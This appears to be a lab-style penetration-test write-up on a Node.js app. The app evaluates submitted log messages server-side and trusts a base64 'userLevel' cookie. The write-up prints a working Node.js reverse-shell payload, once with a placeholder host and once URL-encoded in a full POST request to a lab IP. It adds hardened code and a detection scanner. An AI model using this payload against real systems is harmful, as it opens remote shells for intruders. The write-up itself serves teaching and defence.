Node.Js Command Injection

Weak authentication

The next interesting find is the Event Message field. Considering that this is a NodeJS application, it might be possible to inject JavaScript code through it.

3000/tcp  open  http    syn-ack ttl 63 Node.js (Express middleware)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS

To test this, we'll send a simple 1+1 operation as an "Event Message".

Request Used:

POST /logs/new HTTP/1.1
Host: 192.168.135.110:3000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 25
Origin: http://192.168.135.110:3000
Connection: close
Referer: http://192.168.135.110:3000/logs/
Cookie: connect.sid=s%3AmSgkU3koIQeob1Pioo6GSNTjGvc71M7v.ehFLVLDZWnWSLoKEcRe%2B4BWhaQz7TCQJ9dub4Xc3Cac; userLevel=YWRtaW4=
Upgrade-Insecure-Requests: 1
Sec-GPC: 1

username=khjkhk&msg=2%2B2

Notice the userLevel cookie: its value is only base64-encoded (YWRtaW4= decodes to "admin"), so a client can change its own level simply by sending a different base64 value.

After reviewing the resulting stored message, we confirm that it actually saved 2, i.e. the expression was evaluated server-side instead of being stored as text.
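The two weaknesses in this section, the evaluated Event Message and the client-controlled userLevel cookie, modelled as plain Node.js functions so the behaviour can be reproduced without Express. This is an added example, not code from the original write-up or from the target application; the function names, the in-memory session store and the character allow-list are assumptions.

```javascript
// Added example (not from the original write-up). Only Node.js built-ins are used.

// --- 1. Event Message handling ------------------------------------------------

// Vulnerable: the handler evaluates the submitted message as JavaScript.
// Sending "1+1" stores "2", which is the behaviour observed in the write-up.
function storeMessageVulnerable(msg) {
  // eslint-disable-next-line no-eval
  return String(eval(msg));
}

// Hardened: treat the message as opaque text. Enforce a length limit and a
// printable-ASCII allow-list (assumed policy), and never pass it to
// eval/Function/vm. The text is stored verbatim, so "1+1" stays "1+1".
const MAX_MSG_LEN = 256;
const MSG_ALLOWED = /^[\x20-\x7E]*$/; // printable ASCII only, no control chars

function storeMessageSafe(msg) {
  if (typeof msg !== 'string') throw new TypeError('msg must be a string');
  if (msg.length > MAX_MSG_LEN) throw new RangeError('msg too long');
  if (!MSG_ALLOWED.test(msg)) throw new Error('msg contains disallowed characters');
  return msg;
}

// --- 2. userLevel cookie -----------------------------------------------------

// Vulnerable: the role is read straight from a client-controlled cookie.
// base64 is an encoding, not authentication, so any client can present
// userLevel=YWRtaW4= ("admin").
function roleFromCookieVulnerable(cookieHeader) {
  const m = /(?:^|;\s*)userLevel=([^;]*)/.exec(cookieHeader || '');
  if (!m) return 'guest';
  return Buffer.from(m[1], 'base64').toString('utf8');
}

// Hardened: the role lives in server-side session state looked up by an
// opaque session id; the client never supplies the role itself.
// `sessionStore` is a constructed in-memory stand-in for a real session store.
const sessionStore = new Map([
  ['s1-constructed-session-id', { user: 'alice', role: 'user' }],
]);

function roleFromSessionSafe(cookieHeader) {
  const m = /(?:^|;\s*)sid=([^;]*)/.exec(cookieHeader || '');
  const session = m && sessionStore.get(decodeURIComponent(m[1]));
  return session ? session.role : 'guest';
}

// Usage: storeMessageVulnerable('1+1') -> "2", storeMessageSafe('1+1') -> "1+1",
// roleFromCookieVulnerable('userLevel=YWRtaW4=') -> "admin",
// roleFromSessionSafe('userLevel=YWRtaW4=') -> "guest" (no valid sid).
```

The hardened role lookup ignores userLevel entirely; the only thing the client can present is an opaque session id, and the server decides what that id is allowed to do.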

Since we had already confirmed that the website was vulnerable to NodeJS command injection, we copied the following code:

// Start /bin/bash as a child process and wire its stdin/stdout/stderr to a TCP socket
var net = require("net"), sh = require("child_process").exec("/bin/bash");
var client = new net.Socket();
client.connect(80, "attacker-ip", function(){
    client.pipe(sh.stdin);
    sh.stdout.pipe(client);
    sh.stderr.pipe(client);
});

Changing the script to connect to port 3000 and replacing the listening host with our IP would result in a reverse shell.

Request Used:

POST /logs/new HTTP/1.1
Host: 192.168.135.110:3000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 344
Origin: http://192.168.135.110:3000
Connection: close
Referer: http://192.168.135.110:3000/logs/
Cookie: connect.sid=s%3AmSgkU3koIQeob1Pioo6GSNTjGvc71M7v.ehFLVLDZWnWSLoKEcRe%2B4BWhaQz7TCQJ9dub4Xc3Cac; userLevel=YWRtaW4=
Upgrade-Insecure-Requests: 1
Sec-GPC: 1

username=hjb&msg=var+net+%3D+require%28%22net%22%29%2C+sh+%3D+require%28%22child_process%22%29.exec%28%22%2Fbin%2Fbash%22%29%3B%0D%0Avar+client+%3D+new+net.Socket%28%29%3B%0D%0Aclient.connect%283000%2C+%22192.168.49.135%22%2C+function%28%29%7Bclient.pipe%28sh.stdin%29%3Bsh.stdout.pipe%28client%29%3B%0D%0Ash.stderr.pipe%28client%29%3B%7D%29%3B
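A detection-side check for the request shown above: it decodes an application/x-www-form-urlencoded body and flags msg values that look like JavaScript rather than free text. This is an added example, not part of the original write-up; the indicator list is an assumption rather than an exhaustive rule set, and the two sample bodies are constructed (the suspicious one mirrors the shape of the payload above).

```javascript
// Added example (not from the original write-up). Only Node.js built-ins are used.

// Assumed indicator set: patterns that have no business in a plain log message
// but appear in the kind of payload submitted above.
const INDICATORS = [
  /\brequire\s*\(/,                // module loading
  /child_process/,                 // process spawning module
  /\.exec\s*\(|\.spawn\s*\(/,      // command execution
  /net\.Socket|\.connect\s*\(/,    // outbound connection setup
  /process\.env|process\.binding/, // process internals
];

// Parse an application/x-www-form-urlencoded body into a plain object
// (URLSearchParams handles both %XX escapes and '+' as space).
function parseFormBody(body) {
  return Object.fromEntries(new URLSearchParams(body));
}

// Return the sources of the indicators matched by the msg field (empty if clean).
function scanEventMessage(body) {
  const fields = parseFormBody(body);
  const msg = fields.msg || '';
  return INDICATORS.filter((re) => re.test(msg)).map((re) => re.source);
}

// Constructed sample bodies.
const BENIGN_BODY = 'username=khjkhk&msg=Backup+finished+at+02%3A00';
const SUSPICIOUS_BODY =
  'username=hjb&msg=var+net+%3D+require%28%22net%22%29%2C+sh+%3D+' +
  'require%28%22child_process%22%29.exec%28%22%2Fbin%2Fbash%22%29%3B';

// Usage: scanEventMessage(BENIGN_BODY) -> [] ; scanEventMessage(SUSPICIOUS_BODY)
// -> three matched indicators (require(, child_process, .exec().
```

Running this over access logs or as a pre-storage check on /logs/new gives a cheap signal; it does not replace removing eval from the handler, which is the actual fix.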
